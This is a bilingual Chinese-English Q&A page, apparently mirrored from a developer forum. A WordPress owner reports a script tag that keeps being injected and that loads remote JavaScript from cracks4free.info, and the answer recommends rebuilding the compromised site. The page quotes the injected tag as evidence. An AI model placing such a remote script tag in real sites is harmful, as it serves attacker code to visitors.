防止执行恶意软件javascript [英] prevent malware javascript from executing

问题描述

我正在使用wordpress网站，发现一个恶意软件脚本，每当我尝试保存页面并在所见即所得中单击文本面板时，就会将恶意软件javascript标签自动添加到该页面.这是自动添加的脚本.

i am using a wordpress site, and i found a malware script, whenever i try to save page and click on text panel in WYSIWYG, a malware javascript tag is automatically added to the page. here is the script that is automatically added.

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>

我尝试通过以下代码删除src文件.但是它不起作用，该脚本在body标记关闭之前最后执行.我尝试使用此脚本，但是恶意软件脚本在所有JavaScript加载后加载.这是我的代码.

i tried to remove the src file by the following code. but it didn't work, The script executes last before the closing of body tag. I tried using this script, but the malware script loads after all javascript loaded. here is my code.

<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script> 

我需要删除此代码，或防止通过javasript，jquery，ajax等任何代码执行此代码.谢谢

I need to remove this code, or prevent this code from executing through javasript, jquery, ajax anything.. Just want to get rid of this. Thanks

推荐答案

如果您的服务器已受到威胁，则需要对其进行重建:

If your server has been compromised you need to rebuild it:

1. 导出您现有的内容
2. 使用最新的wordpress版本重建框
3. 导入您的内容
4. 定期应用安全更新

尝试使用javascript清理内容不是解决方案.您已经安装了受损的Wordpress，并且其他一些脚本小子添加了自己的个人风格，这还是一个时间问题，或者更糟的事情会发生.

Trying to use javascript to clean up the content is not a solution. You've got a compromised Wordpress installation and it's a matter of time before some other script-kiddy adds their own personal touches, or something worse happens.

这篇关于防止执行恶意软件javascript的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！